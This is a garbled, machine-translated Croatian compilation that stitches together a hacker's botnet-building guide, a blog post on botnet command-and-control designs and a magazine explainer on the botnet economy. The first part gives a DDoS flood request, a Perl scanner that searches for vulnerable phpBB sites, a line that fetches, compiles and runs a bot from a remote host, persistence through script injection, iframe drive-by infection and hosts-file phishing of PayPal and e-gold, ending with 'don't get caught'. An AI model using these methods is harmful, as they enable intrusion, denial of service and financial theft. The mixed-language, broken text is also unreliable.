Što vam je potrebno da počnete graditi svoj botnet. Kakav bi idealan botnet trebao biti. Koliko koštaju osobni podaci?

Sigurnosni sustavi se stalno poboljšavaju, programeri postaju iskusniji. Sada se čini sve manje poznatih pogrešaka.

[prolog]
Internet raste ogromnom snagom. Hakeru postaje sve teže pronaći ranjivosti. Administratori koriste najbolje stručnjake za sigurnost kako bi zaštitili razvoj. Prepoznajete li svoje misli? Zapravo, internet je pun ranjivosti, pa je od njih malo koristi. Eto kako ti gledaš na to.Eto, zamislite situaciju, uhvatio vas neki mrežni gad, hoćete ga kazniti. Danas ćemo govoriti o stvaranju vlastitog borbenog botneta.
Dakle, što je "bot". Neupućenoj osobi u sjećanje odmah hrle glupi protivnici u računalnim igricama koje ćete upucati za dvije minute. Da, ovo je djelomično točno. U našem slučaju, "bot" je program koji izvršava svoje naredbe. Ništa posebno. Netko će prigovoriti: "Ja sam, kažu, ovo napisao s pet godina, pritisnete gumb i program, olya-la, se zatvori." Zaboravimo djetinjstvo. Svi znamo da su mogućnosti kodiranja beskrajne i da se mogu koristiti za dobro i zlo. Mi, naravno, jer uvijek koristimo naš razvoj u dobrim namjerama. "Botnet" je skup botova okupljenih u jednom centru, koji sinkrono izvršavaju naredbe vlasnika. Botovi, inače, uglavnom ciljaju na više Windows strojeva. Ovdje možete ukrasti lozinke, i staviti sox, i formatirati vijak. Ja ću odstupiti od pravila i reći vam kako napraviti botnet od nix strojeva. Glavna funkcija našeg bota je organiziranje DDOS napadi... Ovo je idealan način za korištenje širokih kanala nix poslužitelja. Hajde da brojimo. Poslužitelj koji želite "popuniti" je na 100Mb kanalu. Odnosno, 10-20 botova koji stoje na istom kanalu će u trenu preplaviti poslužitelj. Ako se možete sakriti iza vatrozida s jednog poslužitelja, onda, nažalost, nema spasa od više botova

[Pisanje bota]
Popis primjera bota možete pronaći na poveznici na kraju članka. Idemo to malo shvatiti s kodom. (uh, Dream opet je li sve kontrolirano preko IRC-a? Hladnije je preko WEB-a!). Inače, upravljanje putem IRC-a odabrano je kroz njegovu interaktivnost. Recimo da želim pokrenuti lokalne nuklearne eksploatacije na nekoliko poslužitelja u botnetu. Samo ću izvršiti naredbu SH uname -a pomoću bota i odmah pronaći računalo koje mi treba. Zatim, nakon što sam također izvršio naredbu u IRC klijentu, učitat ću backdoor i dobiti interaktivnu ljusku za daljnje radnje. Mogućnosti su beskrajne. Reći ćete – takvu kontrolu možete implementirati putem WEB-a, ali zašto ponovno učitavati stranicu i gubiti promet? Puno je prikladnije sve promatrati u stvarnom vremenu (iako, s botnetom više od 1000 botova, možete se pobrinuti za praktičnost sučelja – cca. zdrav razum). Mnogi ljudi misle da je organiziranje DDOS-a vrlo teško. Evo primjera uobičajenog koda za napad:

GET /server.org HTTP / 1.0 \ r \ nVeza: Keep-Alive \ r \ nKorisnički agent: Mozilla / 4.75 (X11; U; Windows 5.2 i686) \ r \ nHost: server.org:80\r\nPrihvati: image / gif, image / x-xbitmap, image / jpeg, image / pjpeg, image / png, * / * \ r \ nAccept-Encoding: gzip \ r \ nAccept-Language: en \ r \ nAccept-Charset: iso- 8859-1, *, utf-8 \ r \ n \ r \ n

To jest, jednostavno šaljemo zahtjev poslužitelju prisiljavajući ga da odgovori. I šaljemo ga dok poslužitelj ne padne zbog nedostatka prometa ili procesorskog vremena. Ali jeste li ograničeni na neke nix botove, na kraju krajeva, trebate stvoriti Windows botnet, na primjer, baziran na AgoBotu. Da biste to učinili, možete stvoriti neki kod za bota koji će skenirati lsasl / dcom ranjivosti na strojevima koji se povezuju na poslužitelj na kojem je bot instaliran.

[Stvorite botnet]
Zapravo je vrlo jednostavno stvoriti botnet. Da bismo to učinili, moramo pronaći ranjivost u bilo kojoj web skripti. Pronađena ranjivost trebala bi omogućiti izvršavanje naredbi ljuske interpretatora. Kada pronađete ranjivost, obratite pozornost na naziv pozadinske datoteke, njezino zaglavlje, naziv ranjivog sustava. Sada, uz pomoć ovih podataka, trebate sastaviti dobro upit za pretraživanje... Na primjer, uzeo sam dobro poznatu ranjivost u phpBB-u<=2.0.10. Название файла - viewtopic.php, переменная указывающаю на значения топика форума - t. Значит поисковый запрос будет вида "Powered by phpBB AND viewtopic.php?t=". Чем разумнее и проще запрос ты составишь, тем больше уязвимых серверов попадутся тебе на удочку. В каждого поискового сервера язык запросов немного отличается, так что почитай его описание, перед тем как составлять запрос. Теперь нужно все это автоматизировать. Отправка запроса поисковику будем осуществлять примерно так на Perl:

$ sock = IO :: Socket :: INET-> novo (PeerAddr => "search.aol.com", PeerPort => "80", P ro to => "tcp") ili sljedeći; print $ sock "GET /aolcom/search?q=viewtopic.php%3Ft%3D7&Stage=0&page=$n HTTP / 1.0 \ n \ n"; @resu =<$sock>; zatvoriti ($ čarapa);

Wget http://server.org/bot.c;gcc bot.c -o bash; chmod + x bash; ./ bash;

Ovdje se mogu vidjeti dva problema odjednom. wget i gcc možda nisu dostupni ili zabranjeni. Ovdje će nam pomoći rookers fech, curl and get ili preglednik konzole lynx, ili pak koristiti ftp protokol. Njegova implementacija je kompliciranija, ali plus je što je ftp posvuda. Što se kompajlera tiče, možete jednostavno prevesti binarnu datoteku na svoju ljusku i nadati se da će sve biti u redu s kompatibilnošću ili prepisati bot u interpretirane jezike - Perl ili PHP. Svaka metoda ima svoje prednosti i nedostatke, koju ćete koristiti, odabir je na vama. Navikao sam maksimalno iskoristiti uhvaćeni poslužitelj. Uostalom, bot na nix poslužitelju će trajati samo do prvog ponovnog pokretanja stroja. Postoji jedan zanimljiv izlaz iz ove situacije. Bot će tražiti čitljive datoteke (.pl, .php) dostupne za pisanje i dodati im kod za preuzimanje i pokretanje. Ili možete stvoriti drugi Windows botnet. Ovo je također lako implementirati. Ovdje nam je potrebna ranjivost u internetskom pregledniku ( Internet Explorer, Opera, Mozilla) koji preuzima i pokreće željenu datoteku... Zatim se stvara inframe unos koji preuzima naš zlonamjerni kod. Ovaj unos se dodaje svim indeksnim datotekama (ili gdje god postoji html koda, sve ovisi o tvom bezobrazluku). Mala skripta Haz, koju ćete također pronaći u arhivi, izvrsno radi s ovakvim radom. Bugtrack je ispunjen zapisima kritičnih ranjivosti u Internet Exploreru, tako da ćemo imati botnet na Windows sustavi(gore sam spomenuo njegove prednosti). To je to, pokrenite naš crv za pretraživanje na ljusci velike brzine, popijte kavu (pivo, votku, sok od rajčice), idite na IRC kanal naveden u svojstvima bota i gledajte broj svojih podređenih. Na kraju, želim pozdraviti sve koji me poznaju i poželjeti vam puno sreće. Nemojte biti uhvaćeni.
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Ranjivost u phpBB-u je relevantna do verzije 2.0.16, iako programeri tvrde da su je ispravili u 2.0.11

Http://_exploits.ath.cx/exploits/data/bots/ http://_www.honeynet.org

Krađa identiteta
Vrlo je prikladno koristiti botove kao phishing organizaciju. Da bismo to učinili, potrebne su nam posebne stranice izoštrene za phishing koje oponašaju stranicu koja nam je potrebna i dobar hosting, namjenski poslužitelj ili VDS. Takve stranice možete sami napraviti, kupiti, pronaći na netu. Izbor je ogroman. Najčešće se krađa identiteta organizira na stranicama: e-gold.com, paypal.com, citybank.com, usbank.com, ebay.com i drugim, na ovaj ili onaj način povezanim s elektroničkom trgovinom. Zatim Windows bot prepisuje datoteku \ system32 \ drivers \ etc \ hosts dodajući joj ip adresu vašeg poslužitelja i dodjeljujući joj alias stranice koja vam je potrebna. Format datoteke je sljedeći:

102.54.94.97 e-gold.com 102.54.94.97 paypal.com

Odnosno, upisivanjem stranica e-gold.com i paypal.com u preglednik, korisnik dolazi do našeg poslužitelja ne sumnjajući ništa. Zauzvrat, na poslužitelju phishera, unosi o odgovarajućim domenama dodaju se u httpd.conf.

DocumentRoot "/home/e-gold.com/www" Ime poslužitelja "www.e-gold.com" Alias ​​poslužitelja "e-gold.com" "www.e-gold.com"

Naravno, linija preglednika će sadržavati poznatu adresu e-gold.com, a čak će se i napredni korisnik prijaviti na stranicu ne sumnjajući ništa. Radi potpunosti, reći ću da ako korisnik koristi proxy poslužitelj, onda ova metoda neće raditi.

Botovi za svaki ukus
Agobot / Phatbot / Forbot / XtremBot
Ovo je najbolja obitelj botova. Napisano u C++. Imaju mnoge funkcije zaštite od detekcije i imaju više od 500 modifikacija zahvaljujući jasno definiranoj modularnoj strukturi.
SDbot / RBot / UrBot / UrXBot
Trenutno vrlo popularni botovi za provođenje DDOS napada. Imati mnogo dodatne funkcije... Kao što su otkrivanje Sock4, keylogger, automatski lsass i dcom skener ranjivosti. Također ima funkciju preusmjeravanja zahtjeva na web stranice antivirusnih tvrtki na lokalni poslužitelj uređivanjem \ system32 \ drivers \ etc \ hosts i instaliranjem malog lažnog web poslužitelja na port 80.
DSNX botovi
Ovaj bot može izvoditi DDOS napade, skeniranje portova i još neke sitnice.
Q8 Botovi
Izvrstan bot za nix sustave. Odlikuje ga kompaktan kod (27 Kb, sastoji se od jedne datoteke) i dobra funkcionalnost. Može se dinamički ažurirati preuzimanjem i pokretanjem nove datoteke. Dobro implementira osnovne DDOS implementacije (SYN-flood, UDP-flood). Zna izvršiti naredbe sustava. Također se dobro prikriva u sustavu.
kaiten
Također dobar bot za Unix / Linux sustave. Zna otvoriti udaljenu ljusku na uhvaćenom poslužitelju.
Botovi bazirani na Perlu
Ovo su vrlo mali botovi napisani u Perlu. Koristi se za DDOS napade na sustave temeljene na Unixu.

---
Članak ima veliku predrasudu prema hakiranju, pa nije jasno - pitajte.

Nije ni čudo što sam objavio nacrt svog članka o peer-to-peer mrežama. Komentari čitatelja bili su od velike pomoći. Upravo su me oni inspirirali na daljnji rad u tom smjeru. Što je iz ovoga proizašlo - pogledajte ispod reza.

Kao što naslov posta sugerira, danas ćemo govoriti samo o botnetima. Zaboravimo na neko vrijeme razmjenu datoteka, proxy mreže, peer-to-peer blogove i p2p-valute.

Riječ "botnet" ne treba shvatiti kao nešto protuzakonito. Kada korisnik dobrovoljno preuzme i instalira "bota" kako bi svoj promet i računalne resurse donirao za potrebe znanstvenog projekta, to je također botnet. Sukladno tome, botmaster nije nužno krivac. Grupa od 30 znanstvenika angažiranih na znanstvenom projektu također je "botmaster".

1. Kontroliranje botneta putem poslužitelja

Najlakši način upravljanja botovima je pokretanje irc/http poslužitelja. Preko njega će botovi primati naredbe i uz njegovu pomoć slati rezultat njihovog izvršenja.

Crtam najbolje što mogu :) U ovom slučaju ilustracija možda nije potrebna, ali odlučio sam vas pripremiti na šok koji će proizvesti ostali crteži.

  • Vrlo jednostavna implementacija, posebno u slučaju IRC-a.
  • Brzi odgovori robota.
  • Možete izdavati naredbe cijeloj mreži i određenom botu.
  • Ako se mreža sastoji od stotina čvorova, za upravljanje je dovoljan jedan kanal u DalNetu. Za veće mreže možete izdvojiti jeftin (oko 300 rubalja mjesečno) web hosting.
  • U slučaju HTTP-a-server uvelike pojednostavljuje razvoj lijepog korisničkog sučelja. Ovo je važno ako koristimo botnet u bilo kojoj web usluzi.
  • Opterećenje poslužitelja. Broj čvorova u najvećim botnetima mjeri se milijunima. Za upravljanje takvom gomilom jedan poslužitelj nije dovoljan.
  • Ako se nešto dogodi poslužitelju (kvar mreže, DDoS, požar u podatkovnom centru), mreža će prestati.
  • Jedan poslužitelj lako je postaviti vatrozid. To može učiniti i davatelj i Kaspersky Lab proizvodi na računalu korisnika.
  • Botmastera je relativno lako pronaći. Jednom sam zaboravio na VPN - čekajte goste u uniformi.
  • U slučaju IRC-a, timovi primaju samo botove online. Ako bot uđe u kanal dvije minute nakon slanja naredbe, bit će "off topic".
  • Broj botova i njihov IP može se odrediti odlaskom na IRC kanal. Zaštita kanala lozinkom neće pomoći, jer je potonju lako odabrati iz koda bota.

2. Upravljanje putem IRC mreže

Logičan korak u borbi protiv nedostataka prethodne metode je stvaranje ne jednog poslužitelja, već nekoliko. Po mom mišljenju, najlakši način za to je postavljanje vaše IRC mreže. U ovom slučaju, puna odgovornost za prijenos podataka između poslužitelja pada na IRC protokol. Sa strane botova, neće biti razlike u odnosu na prethodno rješenje.

  • Jednostavna implementacija, iako ćete se morati pomučiti s postavljanjem poslužitelja.
  • Botovi i dalje brzo reagiraju na naredbe.
  • Još uvijek možete izdavati naredbe određenom botu.
  • Balansiranje opterećenja između poslužitelja, DDoS i zaštita od više sile. Deset dobri serveri moglo bi biti dovoljno za mrežu od milijun botova.
  • Ako neki od poslužitelja pokvare, možete ih imati vremena zamijeniti.
  • Ako koristite IRC i zbunjeni tisuću botova koji sjede na jednom kanalu, koristite više kanala. Sukladno tome, različitim dijelovima mreže mogu se dati različiti zadaci.
  • Morat ćemo se izdvojiti za poslužitelj / VDS.
  • Možete aktivirati sve poslužitelje u isto vrijeme i botmaster ih neće imati vremena zamijeniti.
  • Botmastera je još uvijek dovoljno lako pratiti.
  • U slučaju IRC-a, broj botova i njihov IP su još uvijek na vidiku.
  • Botovi koji su upravo ušli na kanal su izvan teme.

Prvi put sam čuo izraz povjerenje (prsten povjerenja) od kolege Nickolasa u komentarima na prethodni post. Poanta je dodijeliti funkciju "poslužitelja" dijelu botneta.

  • Nisu potrebni poslužitelji.
  • Trastring se može sastojati od stotina čvorova. Postavljanje i praćenje velikog broja irc/http poslužitelja nije jednostavno.
  • Botovi ne moraju cijelo vrijeme održavati trank vezu. Dovoljno je svakih 5-10 minuta provjeravati nove naredbe. Svaki tim mora imati TTL za koji se čuva u povjerenstvu.
  • Veliki broj "poslužitelja" osigurava otpornost mreže na sve vrste katastrofa. Kada dio prstena umre, botmaster može dati naredbu za stvaranje novog povjerenja. Ili to mogu sami čvorovi prstena (potrebni su digitalni potpisi i pristanak određenog postotka povjerenja).
  • Pretpostavimo da se kanalni kanal sastoji od 512 čvorova, od kojih je najmanje 50% stalno na mreži. Ako postoji 1.000.000 botova u mreži i svaki od njih je stalno online, bit će manje od 4.000 botova za svaki pouzdani čvor. Kada bot zatraži naredbe (ili kada šalje rezultat) svakih 10 minuta, svaki čvor prstena će istovremeno obraditi u prosjeku 7 veza. Nije puno za mrežu ove veličine, zar ne?
  • Točan popis svih botova može dobiti samo botmaster.
  • Možete dati naredbe određenom botu ili grupi botova.
  • Brza reakcija botova na naredbe.
  • Botmastera je teško pronaći.

Jedini nedostatak koji vidim je složenost implementacije.

4. Peer-to-peer mreže

Prema internetskim izvorima, P2P botneti su trenutno vrlo popularni. Među tim izvorima zaslužuje najveću pažnju. Svaki čvor takve mreže poznaje samo nekoliko "susjednih" čvorova. Botmaster šalje naredbe na nekoliko mrežnih čvorova, nakon čega se prenosi od susjeda do susjeda.

Popis susjeda izdaje se botovima jednom na posebnom poslužitelju. To može biti, na primjer, hakirana stranica. Poslužitelj ne radi ništa drugo, potreban je samo pri dodavanju čvorova na botnet.

  • Implementacija je nešto jednostavnija nego u prethodnom stavku.
  • Minimalno opterećenje na svim čvorovima u mreži. Veličina botneta je praktički neograničena.
  • Otporan na DDoS, prekide računala itd. Vatrozid na p2p botnetu gotovo je nemoguć.
  • Nema trajnih veza kao kod IRC-a.
  • Potreban vam je poslužitelj, iako ne zadugo.
  • Čvorovi s vremena na vrijeme odumiru, što utječe na povezanost mreže.
  • Da biste dobili popis svih botova, trebate ih, na primjer, uputiti da pristupe određenoj stranici. U ovom slučaju ne postoji jamstvo da će samo botmaster dobiti popis.
  • Da biste dali naredbu određenom čvoru, trebate je ili poslati cijeloj mreži ili se izravno povezati s čvorom.
  • Sporo reagiranje botova na naredbe.
  • Da biste poslali "dugu" naredbu, na primjer, s popisom URL-ova, morate koristiti poslužitelj treće strane, inače će se odgovor botova još više usporiti.
  • Lakše je pronaći botmastera nego u prethodnom primjeru, zbog korištenja neke vrste poslužitelja.

Naravno, mogao bih pogriješiti, ali po mom mišljenju p2p botnet je puno gori od povjerenja. Možda proizvođači antivirusnih programa o nečemu šute?

5. Cjelovito rješenje

Jedan od načina da se izmisli nešto novo i dobro je prekrižiti nešto staro. Spojili smo telefon, računalo, magnetofon, kameru i video kameru – dobili smo pametni telefon. Računalo i kontrola klime u automobilu više nisu iznenađenje. Zalijepite magnet za hladnjak na svaki jogurt i prodaja će skočiti u nebo.

Važno je zapamtiti da neuspješnim križanjem možemo dobiti bezvrijednu osobu. Zvuči kao genetski algoritmi, zar ne? Uzmimo naizgled dobru ideju - peer-to-peer botnet, gdje je povjerenje odgovorno za dodjelu susjeda. Onda nam ne treba nikakav server!

Ali u ovom slučaju, složenost provedbe će se povećati, iako samo neznatno. Ostali problemi p2p botneta ostat će neriješeni. Pobjeda je beznačajna, rezultat je 1:1.

Nakon što sam malo sjedio s papirićem i olovkom, došao sam na sljedeću ideju. Koliko ja znam, to se nikada prije nije oglašavalo, a ja sam prvi koji je tako nešto smislio. ChSV plus 100.

Što ako mreža ima dva stanja - "aktivno" i "pasivno". U pasivnom stanju, botnet radi na p2p bazi. Botmaster šalje naredbu za "mobilizaciju trupa" i mreža se pretvara u pouzdanu. U svom timu, botmaster mora naznačiti čvorove povjerenja i vrijeme do kojeg mreža mijenja svoje stanje. Da bi prsten bio veći, možete uputiti nekoliko botova da imenuju svoje susjede. Nadalje, sve naredbe se prenose kroz kanal. On je također odgovoran za dodjelu "susjeda" novim čvorovima. Ako se TTL prstena naknadno pokaže nedostatnim, može se dati naredba "proširi aktivno stanje".

Takav botnet neće naslijediti niti jedan minus p2p mreže i imat će sve pluse povjerenja, kao i sljedeće:

  • Povećana otpornost na ddos ​​napade i mrežne filtere, poput p2p mreže.
  • Minimalna potrošnja resursa od strane botova tijekom zastoja mreže. Botmaster ne treba pratiti stanje povjerenja i odabrati nove čvorove za njega.
  • Prilikom stvaranja povjerenja odabiru se samo oni čvorovi koji su trenutno na mreži. Botovi će se spojiti na prsten u prvom pokušaju (neko vrijeme).
  • Popis "susjeda" povremeno se ažurira. Svejedno, cijeli botnet zna IP čvorova uključenih u privremeni prsten. Pa neka te čvorove smatraju susjedima, ako se neki od pravih susjeda već dugo nisu pojavili u mreži.

A jedini nedostatak koji ovdje vidim je složenost implementacije. Ali to zapravo i nije problem.

6. Što je važno zapamtiti

Do sada sam šutio o nekim točkama, jer su one svojstvene bilo kojoj od gore navedenih metoda kontrole botneta. Trebali biste se usredotočiti na njih.

  • Neki domaćini ne mogu prihvatiti dolazne veze zbog vatrozida ili NAT-a. U najmanju ruku, to treba uzeti u obzir prilikom pisanja bota. Na primjer, prilikom distribucije naredbi u p2p mreži, sam bot mora povremeno kontaktirati svoje susjede, a ne čekati naredbu od njih.
  • Treba pretpostaviti da se slušaju sve naredbe poslane u mrežu. U najmanju ruku, zainteresirana strana može izmijeniti botov kod u tu svrhu. Međutim, ima smisla šifrirati sav promet na mreži. To će u najmanju ruku zakomplicirati analizu botneta.
  • Sve naredbe botmastera moraju biti digitalno potpisane. Lozinke nisu dobre jer se mogu presresti.
  • Budući da je riječ o implementaciji, napominjem da bi u svakom botnetu trebale biti predviđene najmanje tri naredbe - ažuriranje botova, ažuriranje ključa botmastera i samouništenje cijele mreže.
  • U mreži postoje "špijunski" čvorovi. Neki od njih su uključeni u trust. Pritom ne znamo koji su ciljevi koje ti "špijuni" slijede - to može biti identifikacija IP-a botmastera, poremećaj izvršavanja naredbi, onemogućavanje mreže, stjecanje kontrole nad botnetom i tako dalje. Konkretno, to znači da bi botovi trebali odabrati nasumični čvor prilikom povezivanja na prsten, a ne koristiti isti cijelo vrijeme.
  • Na slici su čvorovi povjerenja spojeni svaki na svaki, ali je mnogo praktičnije realizirati prsten u obliku male p2p mreže, odnosno po principu "susjeda".

Također napominjem da rješenja 1 i 2 (poslužitelj, mnogo poslužitelja) gube mnoge nedostatke i dobivaju nekoliko prednosti od rješenja 3 (trunking) kada se koristi HTTP protokol. Ponovno prođite kroz ove točke da vidite na što mislim.

7. Zaključci

Za male mreže dobra odluka je korištenje IRC-a. Na primjer, ako želite stvoriti vlastitu malu mrežu za distribuirano računanje, postavite bot na kućno računalo, prijenosno računalo, netbook, radno računalo (ako je dopušteno pravilima tvrtke) i upravljajte svojom mrežom putem DalNeta. Ako je potrebno, kasnije se mreža može "pumpati" u trust. Dat ćete odgovarajuću naredbu, zar ne?

Ako botnet treba lijepo web sučelje, možda bi imalo smisla napisati dodatni program koji će zgrabiti naredbe s web poslužitelja i poslati ih IRC-u. Barem razmislite o ovom pristupu.

Univerzalna rješenja su povjerenje i p2p + povjerenje. Takve mreže će raditi idealno bez obzira na to koliko čvorova imaju, 1 ili 1.000.000, bez ikakvih poslužitelja.

Zbog činjenice da "čisti p2p" ima očite nedostatke u usporedbi s prstenom, ostaje mi nejasno zašto se to smatra dobrim rješenjem. Sigurno je da među botovima koji čine mrežu ima mnogo korisne funkcije... Zašto ne dodati još jedan mali teret - mobilizaciju mreže u povjerenju?

To je, možda, sve. Bilo bi mi drago svakom Vašem komentaru. Pogotovo s kritikama, naznakama netočnosti/proturječnosti u tekstu i vašim idejama o pokrenutoj temi.

Botneti su danas postali jedan od glavnih alata za kibernetičke kriminalce. ComputerBild će vam reći što su botneti, kako rade i kako spasiti svoje računalo od pada u zombi mrežu.

Botnet ili zombi mreža je mreža računala zaraženih zlonamjernim softverom koja napadačima omogućuje daljinsko upravljanje strojevima drugih ljudi bez znanja njihovih vlasnika. Posljednjih godina zombi mreže postale su stabilan izvor prihoda za kibernetičke kriminalce. Dosljedno niski troškovi i minimalno znanje potrebno za upravljanje botnetima pridonose rastu popularnosti, a time i broja botneta. Napadači i njihovi klijenti zarađuju tisuće dolara od DDoS-a ili spam napada koji se provode pomoću zombi mreža.

Je li moje računalo zaraženo botom?

Odgovor na ovo pitanje nije lak. Činjenica je da je gotovo nemoguće pratiti smetnje botova u svakodnevnom radu osobnog računala, jer to ni na koji način ne utječe na performanse sustava. Ipak, postoji nekoliko znakova po kojima možete utvrditi da je bot prisutan u sustavu:

Nepoznati programi pokušavaju se spojiti na Internet, što povremeno javlja ogorčeno vatrozid ili antivirusni softver;

Internetski promet postaje vrlo visok, iako vrlo rijetko koristite web;

Na popisu pokrenutih procesa sustava pojavljuju se novi, maskirani kao obični Windows procesi (na primjer, bot se može zvati scvhost.exe - ovaj naziv je vrlo sličan nazivu proces sustava Windows svchost.exe; prilično je teško uočiti razliku, ali je moguće).

Zašto se stvaraju botnetovi

Botneti su stvoreni da bi zaradili novac. Može se razlikovati nekoliko područja komercijalno isplative upotrebe zombi mreža: DDoS napadi, prikupljanje povjerljivih informacija, slanje neželjene pošte, phishing, neželjene pošte tražilice, povećanje brojača klikova itd. botnet omogućuje da se sve ove vrste aktivnosti provode istovremeno .

DDoS napad (Distributed Denial-of-Service) je napad na računalni sustav, na primjer, na web stranicu čija je svrha dovesti sustav do "crasha", odnosno stanja kada više neće moći prihvaćati i obrađivati ​​zahtjeve legitimnih korisnika. Jedna od najčešćih metoda izvođenja DDoS napada je slanje brojnih zahtjeva na računalo ili stranicu žrtve, što dovodi do uskraćivanja usluge ako resursi napadnutog računala nisu dovoljni za obradu svih dolaznih zahtjeva. DDoS napadi su strašno oružje za hakere, a botnet je idealan alat za njihovo provođenje.

DDoS napadi mogu biti i sredstvo nelojalne konkurencije i djela cyber terorizma. Vlasnik botneta može svakom ne previše skrupuloznom poduzetniku pružiti uslugu - da izvrši DDoS napad na web stranicu svog konkurenta. Napadnuti resurs nakon takvog opterećenja će "ležati", napadač će dobiti privremenu prednost, a cyber kriminalac će dobiti skromnu (ili ne baš) nagradu.

Na isti način i sami vlasnici botneta mogu koristiti DDoS napade za iznuđivanje novca velike tvrtke... Istodobno, tvrtke radije udovoljavaju zahtjevima kibernetičkih kriminalaca, budući da je otklanjanje posljedica uspješnih DDoS napada vrlo skupo. Na primjer, u siječnju 2009. jedan od najvećih hosting providera GoDaddy.com bio je podvrgnut DDoS napadu, zbog čega su tisuće stranica koje su bile smještene na njegovim poslužiteljima bile nedostupne gotovo cijeli dan. Financijski gubici hostera bili su enormni.

U veljači 2007. godine izvršen je niz napada na root DNS poslužitelje koji izravno utječu na normalno funkcioniranje cijelog Interneta. Malo je vjerojatno da je svrha ovih napada bila kolaps Svjetska mreža, jer je postojanje zombi mreža moguće samo ako internet postoji i normalno funkcionira. Najviše je to izgledalo kao demonstracija moći i mogućnosti zombi mreža.

Oglasi za usluge DDoS napada otvoreno se objavljuju na mnogim forumima relevantne teme. Cijene napada kreću se od 50 dolara do nekoliko tisuća dolara po danu kontinuiranog rada DDoS botneta. Prema web stranici www.shadowserver.org, 2008. godine izvršeno je oko 190.000 DDoS napada na kojima su cyber kriminalci mogli zaraditi oko 20 milijuna dolara. Naravno, ovaj iznos ne uključuje prihode od ucjena, koje je jednostavno nemoguće izračunati.

Prikupljanje povjerljivih informacija

Povjerljive informacije pohranjene na računalima korisnika uvijek će privući uljeze. Najveći interes su brojke kreditne kartice, financijske informacije i lozinke za razne usluge: poštanski sandučići, FTP-poslužitelji, "messengeri" itd. U isto vrijeme, moderni zlonamjernog softvera omogućiti napadačima da odaberu točno one podatke koji ih zanimaju - za to je dovoljno preuzeti odgovarajući modul na računalo.

Napadači mogu ili prodati ukradene informacije ili ih iskoristiti u svoju korist. Na brojnim internetskim forumima svakodnevno se pojavljuju stotine oglasa za prodaju bankovnih računa. Cijena računa ovisi o iznosu novca na korisničkom računu i kreće se od 1 do 1500 dolara po računu. Donja granica pokazuje da su kibernetički kriminalci u ovoj vrsti poslovanja prisiljeni snižavati cijene tijekom konkurencije. Da bi zaradili puno novca, potreban im je stalan protok svježih podataka, a to zahtijeva stalan rast zombi mreža. Financijske informacije posebno su zanimljive za kardere - cyber kriminalce koji se bave krivotvorinama bankovne kartice.

Koliko su takve operacije isplative može se prosuditi po poznatoj priči o skupini brazilskih cyber kriminalaca koji su uhićeni prije dvije godine. Uspjeli su podići s bankovnih računa obični korisnici 4,74 milijuna dolara koristeći informacije ukradene s računala. Za stjecanje osobnih podataka koji nisu izravno povezani s novcem korisnika zainteresirani su i kriminalci koji se bave krivotvorenjem dokumenata, otvaranjem lažnih bankovnih računa, obavljanjem nezakonitih transakcija i sl.

Druga vrsta informacija koje prikupljaju botnetovi su adrese E-mail, i, za razliku od brojeva kreditnih kartica i brojeva računa, od Adresar jedno zaraženo računalo, mnogo email adrese... Prikupljene adrese stavljaju se na prodaju, a ponekad i "po težini" - po megabajtu. Glavni kupci takve "robe" su spameri. Popis od milijun e-mail adresa košta od 20 do 100 dolara, a slanje pošte na isti milijun adresa koje naruče spameri je 150-200 dolara. Prednosti su jasne.

Zainteresirani su i kriminalci Računi razne plaćene usluge i online trgovine. Naravno, jeftiniji su od bankovnih računa, ali njihova provedba povezana je s manjim rizikom od uznemiravanja od strane agencija za provođenje zakona.

Milijuni neželjenih poruka svakodnevno putuju diljem svijeta. Slanje neželjene pošte jedna je od glavnih funkcija modernih botneta. Prema Kaspersky Labu, oko 80% sve neželjene pošte šalje se preko zombi mreža. Milijarde pisama šalju se s računala korisnika koji poštuju zakon s reklamama za Viagru, kopijama skupih satova, online kockarnicama itd., začepljujući komunikacijske kanale i poštanske sandučiće. Tako hakeri ugrožavaju računala nevinih korisnika: adrese s kojih se vrši slanje pošte spadaju na crne liste antivirusnih tvrtki.

Posljednjih godina proširila se i sama sfera spam usluga: pojavio se ICQ spam, spam u društvene mreže, forumi, blogovi. I to je također "zasluga" vlasnika botnet-a: uostalom, nije teško dodati dodatni modul bot klijentu, otvarajući horizonte za nove poslove sa sloganima poput "Spam na Facebooku. Jeftino". Cijene neželjene pošte variraju ovisno o ciljanoj publici i broju e-mail adresa koje se šalju. Raspon cijena za ciljanu poštu - od 70 dolara za stotine tisuća adresa do 1000 dolara za desetke milijuna adresa. Tijekom prošle godine, pošiljatelji neželjene pošte zaradili su oko 780 milijuna dolara slanjem pošte.

Generiranje neželjene pošte pretraživanja

Druga mogućnost korištenja botneta je povećanje popularnosti web stranica u tražilicama. Radi na optimizacija pretraživača, administratori resursa pokušavaju povećati poziciju stranice u rezultatima pretraživanja, jer što je ona viša, to će više posjetitelja doći na stranicu putem tražilice a samim tim i veći prihod će vlasnik stranice dobiti, na primjer od prodaje oglasnog prostora na web stranicama. Mnoge tvrtke plaćaju webmasterima dosta novca da svoju stranicu dovedu na prve pozicije u "tražilicama". Vlasnici botneta špijunirali su neke od njihovih trikova i automatizirali proces optimizacije za tražilice.

Kada vidite u komentarima na svoj unos u LiveJournal ili uspješnu fotografiju objavljenu na hostingu fotografija, puno linkova koje je stvorila nepoznata osoba, a ponekad i vaš prijatelj, nemojte se iznenaditi: upravo je netko naručio promociju svog resursa vlasnicima botneta. Posebno kreirani program učitava se na zombi računalo i u ime svog vlasnika ostavlja komentare na popularnim resursima s poveznicama na promoviranu stranicu. Prosječna cijena za ilegalne usluge neželjene pošte tražilice je oko 300 USD mjesečno.

Koliko koštaju osobni podaci?

Trošak ukradenih osobnih podataka izravno ovisi o zemlji u kojoj živi njihov pravi vlasnik. Primjerice, potpuni podaci stanovnika SAD-a koštaju 5-8 dolara. Na crnom tržištu posebno su cijenjeni podaci stanovnika EU - oni su dva do tri puta skuplji od podataka građana SAD-a i Kanade. To se može objasniti činjenicom da takve podatke mogu koristiti kriminalci u bilo kojoj zemlji EU-a. U prosjeku u svijetu cijena kompletnog paketa podataka o jednoj osobi je oko 7 dolara.

Nažalost, svatko tko je odlučio organizirati botnet od nule lako će na internetu pronaći upute kako stvoriti zombi mrežu. Prvi korak: stvorite novu zombi mrežu. Da biste to učinili, morate zaraziti računala korisnika posebnim programom - botom. Za infekciju se koriste neželjene pošte, objavljivanje poruka na forumima i društvenim mrežama i druge tehnike; često je bot obdaren funkcijom koja se sama širi, poput virusa ili crva.

